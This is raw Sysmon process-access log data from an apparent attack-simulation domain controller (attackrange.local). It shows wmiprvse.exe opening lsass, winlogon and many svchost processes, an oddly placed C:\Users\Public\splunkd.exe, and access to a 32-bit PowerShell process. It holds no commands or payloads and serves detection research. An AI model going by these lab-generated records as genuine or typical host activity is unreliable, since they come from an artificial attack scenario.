15:59:17.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023293Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023292Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023291Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023290Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023289Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023288Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023287Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023286Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023285Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023284Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023283Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023282Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023281Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023280Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023279Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023278Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023277Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023276Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.273{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023275Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.273{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023274Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:17.226{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5355-6008-3606-00000000A301}7732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023273Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 